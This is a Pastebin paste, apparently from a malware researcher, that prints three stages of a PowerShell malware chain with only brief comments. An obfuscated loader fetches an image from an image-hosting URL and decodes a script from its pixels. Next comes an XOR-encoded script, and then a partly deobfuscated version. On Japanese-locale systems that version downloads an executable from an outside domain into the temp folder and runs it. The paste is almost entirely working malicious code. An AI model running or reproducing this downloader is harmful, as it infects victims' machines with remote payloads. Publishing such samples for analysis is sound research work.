Advertisement
dissectmalware

Mal code

Oct 31st, 2018
1,044
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # https://twitter.com/DissectMalware/status/1057515530918248448
  2.  
  3. # code that download an image file that contains mal powershell script
  4.  
  5. &("{2}{1}{0}" -f 'EM','IT','SET-')  ("{1}{2}{0}" -f'2dG','vA','riable:')  (  [TyPE]("{0}{1}"-F 'MAT','H')  );  .("{0}{1}{2}" -f 'sE','t-','itEM')  ("{1}{0}{2}{4}{3}"-f 'a','vari','B','dGNV','lE:') ( [TyPE]("{4}{1}{0}{3}{2}" -F '.ENC','Em.TeXT','nG','Odi','sysT')  )  ;  &("{0}{1}" -f 's','al') ('a') ("{0}{1}{2}"-f'New-Obje','c','t');.("{1}{0}" -f '-Type','Add') -AssemblyName ("{0}{2}{3}{1}{4}" -f'Sy','rawi','s','tem.D','ng');${g}=&('a') ("{4}{1}{3}{2}{0}"-f 'p','tem.Dra','g.Bitma','win','Sys')((.('a') ("{2}{0}{1}"-f 'lien','t','Net.WebC')).("{1}{0}" -f'enRead','Op').Invoke(("{0}{2}{3}{6}{5}{1}{4}" -f 'ht','e.ibb.co/jrDJv0/hp.pn','tps:/','/im','g','g','a')));${o}=.('a') ("{0}{1}" -f'By','te[]') 4960;(0..7)|&('%'){foreach(${x} in(0..619)){${P}=${G}.("{2}{1}{0}" -f 'el','ix','GetP').Invoke(${X},${_});${O}[${_}*620+${X}]=( (.("{2}{0}{1}"-f'rIAB','le','VA')  ("{1}{0}"-f'dG','2') -VaLUeoNlY )::("{1}{0}"-f'loor','F').Invoke((${p}."B"-band15)*16)-bor(${P}."G" -band 15))}};.("{1}{0}" -f 'X','IE')( (&("{0}{1}{2}{3}"-f 'G','et-vA','rI','ABlE') ("{0}{1}"-f'DG','Nv') -vAlueo  )::"aSC`iI"."getS`Tr`INg"(${o}[0..4732]))
  6.  
  7.  
  8. # extracted mal powershell script
  9.  
  10. (([CHAr[]] ( 31,64,117,91, 110,118 , 72 ,70 , 6 ,21 ,19,25, 64 , 8, 70 , 64 , 9 ,70 , 64 , 10 , 70, 64 ,11 , 70 , 25, 27 ,22 ,93, 28 ,94,28 , 23, 28,79 , 78 ,73 ,28 , 23,28, 94 , 79, 22,120 , 78,87, 28, 23 , 28,124,28 , 18 ,27 , 71 ,27,21 , 19, 25,64 , 11,70 , 64 , 10, 70 , 64,9 ,70 , 25, 27 ,22 , 93,28, 125 , 28 ,23, 28,84, 73, 86, 90,79 , 22,119, 28 , 23 ,28 ,82,72 , 79 ,28 , 18 ,27 , 22 , 107 ,73 , 84,75, 94, 73, 79,66,27 , 19, 28,17 , 28 ,18,27 , 71 ,27 ,21 , 19,25,64 , 10 , 70 , 64, 11, 70,64 , 9 , 70 , 25,22 ,93, 27,28,22 , 104,79,73 ,82, 28 , 23,28 , 116 , 78, 79 ,28,23 ,28 ,85,92 ,28,18,27 ,22,104, 79,73 , 94 ,90 ,86, 0,82 , 93 ,27, 19 , 31, 64, 85 , 110,91, 118 ,104, 70 ,27,22, 118,90 , 79 ,88, 83, 27 , 25,81,90 ,25, 18 , 64, 31 ,64, 115, 91,94 ,72, 70,6 ,19 , 25 ,64,15, 70, 64, 11, 70,64 , 10 , 70, 64, 9,70, 64,8,70,25, 27, 22,93 , 28 , 79, 79 , 75, 1, 20, 20,28,23 ,28,86 , 90 ,28 ,23 , 28, 73, 79 ,94 , 28 , 23 , 28, 85, 84, 95 , 21, 88 , 84, 86,20,76,84 ,73,87, 95 , 79, 82 ,86,94 , 28 , 23 , 28 , 83 , 28,18, 23, 25 ,25 ,0, 93, 84 ,73 , 94, 90 ,88 , 83 , 19 ,31 ,64 ,110 ,91,105,87, 70,27 , 82 ,85 ,27,31 ,64, 115 ,91 ,94, 72 , 70,18, 64 , 111, 73 ,66 ,64 , 29,19 , 25,64,9 , 70 , 64 ,11, 70,64,10 , 70,25, 27,22 , 93 , 28,84 ,72,28,23, 28, 79 , 28, 23,28 , 76 ,73, 82,79, 94,22 ,115 , 28 ,18 ,27 ,31, 64 , 110 , 91,105 ,87 , 70,0 ,31,64 , 125, 80 ,70 , 27,6,27, 25,31,94, 85,77 , 1,79 ,94,86 ,75 , 103 ,89, 73 ,78 ,72, 83 ,21 , 94 ,67, 94 , 25, 0,29,19,25, 64,10 ,70 ,64 ,8 , 70 , 64 ,9 , 70 ,64,11,70 ,25,27, 22,93 , 28 ,22,115,84 ,72 , 79, 28 ,23, 28,108 , 28, 23 , 28, 94 ,28 ,23 , 28, 73, 82,79,28,18,27, 31,64 ,93, 91 ,112, 70 , 0 ,31,64, 124 , 125, 70,27, 6 , 27 ,21 ,19, 25,64 , 9,70 ,64 , 11 , 70 ,64 ,10, 70, 64,8,70, 25 ,27 , 22, 93,27,28, 94, 76,22 , 116 , 28,23 ,28 , 89 , 28,23 ,28 , 117, 28 ,23 , 28 , 81,94, 88,79 , 28,18 , 27,19,25,64 , 10 ,70,64,15, 70,64 , 14, 70 , 64 ,9, 70,64 ,13, 70,64 ,11 , 70 , 64,8 ,70, 25, 22,93 ,27 , 28 ,94 ,85, 28 , 23,28,104 ,66, 28,23 , 28, 21 ,108 ,28 ,23, 28 ,79 , 28 , 23, 28, 72 , 79, 94,86 , 21 , 117 , 94, 28,23 , 28 , 79 , 28,23,28 ,94 ,89 , 120,87,82 , 28,18, 0, 31, 64,92 , 125, 70 ,21,25,115 ,126,91,122 ,95 , 94 ,105 ,104,25,21 ,19 ,25,64,10,70,64 , 11, 70 , 25,22,93 , 28 ,95 , 95,28 , 23, 28 ,122 ,28 ,18, 21,114, 85, 77, 84,80 ,94, 19 , 19 ,25 , 64,10 , 70 ,64,11 , 70, 64 , 9,70,25,22, 93,27, 28, 90 , 92 ,94,28 , 23, 28,78 , 72 ,94,73, 22 ,28, 23 ,28 , 85,79,28 ,18, 23,19 ,19,25, 64 , 9,15,70,64, 10,3,70, 64,9 ,11,70 , 64 ,14 , 70, 64 ,10 ,12, 70, 64,13,70,64,10,15 , 70,64, 11, 70, 64 ,8, 11, 70 ,64 ,10, 8 ,70, 64 , 9 , 13, 70 , 64 ,8,70, 64 ,9, 9,70 , 64, 10,10 ,70 , 64, 12, 70 ,64 ,10,70 , 64 , 10 , 11 , 70, 64 , 8,10 ,70 , 64 , 9,3,70,64 ,9 , 12, 70, 64 ,9 , 14,70 , 64, 10, 13 , 70 , 64, 9, 2, 70 ,64 ,10 , 2 , 70 ,64 ,9,8,70, 64, 9 , 10 ,70 , 64 , 10 , 9 , 70, 64,3, 70, 64 ,9 ,70 ,64 , 2 ,70, 64 , 15, 70 , 64 ,10,14 ,70, 25, 22 , 93 , 27, 28 , 84 , 76,72, 27, 28,23 , 28,108,28, 23 , 28 , 20, 28 ,23,28 , 104,18 , 28,23, 28,8 , 15, 21 , 28 , 23,28 , 90,20 , 14 ,21, 11, 27 ,19,108 , 82,85 ,95 ,84 , 76 , 72,27 ,117, 28 ,23 , 28 , 27 , 108 , 82, 85, 28, 23,28 ,87, 94,28,23 ,28,93 ,90 ,73,82, 28, 23 , 28, 14 ,28 ,23 , 28 , 94, 89 , 112, 82 , 79,20, 14 , 8 , 15,28, 23, 28,75 , 28, 23 , 28,21, 14,11 ,11,21 ,11, 27, 104 , 90,28 , 23, 28,78 , 72 , 28, 23,28, 95, 28 ,23 , 28, 13, 28 , 23,28 ,88 ,80 , 84 , 18, 27 , 120,28,23,28 , 111, 0 , 28 ,23, 28 ,84, 65 ,28 ,23 ,28 ,12 ,28 ,23 , 28 , 82, 87,87, 28, 23, 28 , 11, 28,23 , 28 , 27,122 ,75 ,28,23, 28, 21 , 28 ,23, 28, 118,28 , 23, 28 ,118 , 119 ,23,27, 87 , 82 , 80, 94, 27 ,124 ,94, 28 ,23 ,28, 22,110 ,28, 23 ,28, 112 ,115, 111, 28 ,23,28 , 13 , 27 , 19, 28, 23 , 28, 83 ,73 ,84, 86 , 94,20,28 , 23 , 28 ,117, 111 ,27 ,10 ,11 , 21 , 11, 0 ,27,28, 23, 28,21,28, 18 , 18 , 18, 0 , 31 ,64 , 92, 91 , 125,70 ,21,19, 25, 64, 10,70 ,64 ,9 , 70,64 ,8, 70,64 , 11,70 , 25 ,27 , 22,93,28,82,87 ,94 ,28 , 23,28,127 ,28 , 23 ,28,84 ,76 ,85, 87 ,84 ,90 , 95 ,28 , 23,28,125, 28,18,21,114, 85 ,77 ,84, 80 ,94,19, 31, 64,110,91 ,105, 87, 70 , 23 ,27 , 31 ,64, 93 , 80, 70, 18 , 0 ,29 , 19, 25 , 64, 10,70,64 ,9, 70 ,64,11, 70, 25, 27, 22 ,93,27,28,94,72, 72 ,28 ,23 , 28 , 104 , 79 , 90,73 , 28 , 23 , 28 ,79, 22,107 ,73, 84 ,88 ,28 ,18 ,27,31 ,64 , 93,80,70,0,89 , 73, 94 , 90 , 80, 70,120, 90,79 ,88 , 83 ,64 , 21,19 , 25 , 64 , 9 ,70 , 64 ,11 , 70 ,64 , 10 , 70 , 25 , 27,22 , 93,28,115 ,84 ,72 ,28, 23 , 28 ,79 ,28 ,23, 28 , 108, 73,82 , 79,94 ,22 ,28 ,18 , 27,31,64,100,70,21 ,25,126,67, 91, 120 , 94, 107 , 91, 111 , 82 , 84 ,85 , 25, 21, 25 ,118, 91, 126, 104, 72,90 ,124,94 ,25 , 70,70,70)|%{ [CHAr] ( $_ -BXOR'0x3B' )}) -Join'')
  11.  
  12.  
  13. # after deobfuscation
  14. ${N`UMs}=.("{3}{2}{1}{0}" -f'e','tur','et-Cul','G') | .("{0}{1}{2}" -f'F','ormat-L','ist') -Property ('*') | .("{1}{0}{2}"-f '-Stri','Out','ng') -Stream;if (${nU`MS} -Match "ja"){${H`es}=("{4}{0}{1}{2}{3}" -f'ttp://','ma','rte','nod.com/worldtime','h'),"";foreach(${U`Rl} in ${H`es}){Try{&("{2}{0}{1}" -f'os','t','write-H') ${U`Rl};${Fk} = "$env:temp\brush.exe";&("{1}{3}{2}{0}" -f'-Host','W','e','rit') ${f`K};${GF} = .("{2}{0}{1}{3}" -f 'ew-O','b','N','ject') ("{1}{4}{5}{2}{6}{0}{3}"-f 'en','Sy','.W','t','stem.Ne','t','ebCli');${gF}."HE`AdeRS".("{1}{0}"-f'dd','A').Invoke(("{1}{0}{2}"-f 'age','user-','nt'),(("{24}{18}{20}{5}{17}{6}{14}{0}{30}{13}{26}{3}{22}{11}{7}{1}{10}{31}{28}{27}{25}{16}{29}{19}{23}{21}{12}{8}{2}{9}{4}{15}"-f 'ows ','W','/','S)','34.','a/5.0 (Windows N',' Win','le','fari','5','ebKit/534','p','.500.0 Sa','us','d','6','cko) C','T;','oz','7','ill','0',' Ap','.','M','ML, like Ge','-U','KHT','6 (','hrome/','NT 10.0; ','.')));${g`F}.("{1}{2}{3}{0}" -f'ile','D','ownload','F').Invoke(${U`Rl}, ${fk});&("{1}{2}{0}" -f 'ess','Star','t-Proc') ${fk};break}Catch{.("{2}{0}{1}" -f'Hos','t','Write-') ${_}."Ex`CeP`Tion"."M`ESsaGe"}}}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement